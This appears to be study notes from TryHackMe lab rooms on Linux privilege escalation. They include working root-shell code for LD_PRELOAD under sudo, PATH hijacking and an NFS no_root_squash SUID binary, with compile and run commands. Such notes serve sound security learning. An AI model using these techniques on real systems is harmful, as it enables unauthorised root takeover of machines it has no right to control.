SUDO
First, always start with sudo -l, this will list anything you're able to run sudo as. Also take note if your sudo has the option for LD_PRELOAD. If you do, you can create a C file like the below.
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}compile it like this:
gcc -fPIC -shared -o shell.so shell.c -nostartfilesWe can now use this file when launching any program our user can run with sudo. We need to run the program by specifying the LD_PRELOAD option:
sudo LD_PRELOAD=/home/user/ldpreload/shell.so findNext, take what you can run and use https://gtfobins.github.io/gtfobins/nmap/ to find a way to elevate.
Look for ways to Leverage application functions. Some applications can have pre-loaded modules that you can create to run. For example Apache has a -f option that allows you to provide additional configuration files.
SUID
SUID (Set-user Identification) and SGID (Set-group Identification) allow files to be executed with the permission level of the file owner or the group owner.
find / -type f -perm -04000 -ls 2>/dev/null will list files that have SUID or SGID bits set. Once again, we'll visit GTFOBins and see what we can find with the SUID filter, based on the list we get back.
CAPABILITIES
Capabilities help manage privileges on a binary at a more granular level. We can use the "getcap" tool to list enabled capabilities. Be sure to run this command with the /dev/null redirect on so you're not drowning in error messages.
getcap -r /Here's an example from one of the THM study rooms:
We can see from GTFOBins that we can use the capabilities on it to drop us into a root shell.
CRON JOBS
Cron jobs are used to run scripts or binaries at specific times. Each user on the system has their own crontab file and can run specific tasks. You can see these tasks using this:
cat /etc/crontabENVIRONMENT VARIABLES
What folders are located under $PATH
echo $PATHDoes your current user have write privileges for any of these folders?
find / -writable 2>/dev/null | cut -d "/" -f 2 | sort -u
find / -writable 2>/dev/null | grep usr | cut -d "/" -f 2 | sort -u <-- does the same but on the sub folder 'usr'Can you modify $PATH?
export PATH=/tmp:$PATHIs there a script/application you can start that will be affected by this vulnerability? You can create your own binary by using a script like this (taken from THM Linux Priv Esc course), which is named path_exp.c
#include<unistd.h>
void main()
{ setuid(0);
setgid(0);
system("alder");
}We then compile it like this
gcc path_exp.c -o alder -w
chmod u+s alderNFS
Network File Sharing configuration is kept in the /etc/exports file. This file is created during the NFS server installation and can usually be read by users. Here's what you're looking for:
$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/home/backup *(rw,sync,insecure,no_root_squash,no_subtree_check)
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
/home/ubuntu/sharedfolder *(rw,sync,insecure,no_root_squash,no_subtree_check)If you see this, check for shares:
showmount -e 10.10.109.187Then we'll mount those shares - on our attack box
$ mkdir /tmp/stealyourstuff
$ sudo mount -o rw 10.10.109.187/home/backup /tmp/stealyourstuffJust like under "Environment Variables" above, we're going to compile our own binary and set the SUID bit on it, in the folder we created.
sudo nano nfs.c
The binary:
int main()
{ setgid(0);
setuid(0);
system("/bin/bash");
return 0;
}Compile and set the SUID then go back to the client box.
sudo gcc nfs.c -o nfs -w
sudo chmod +s nfs
ls -la nfsrun the app and it should drop you into root. NOTE: the gcc compiler MUST be a compatible version on the client machine.
l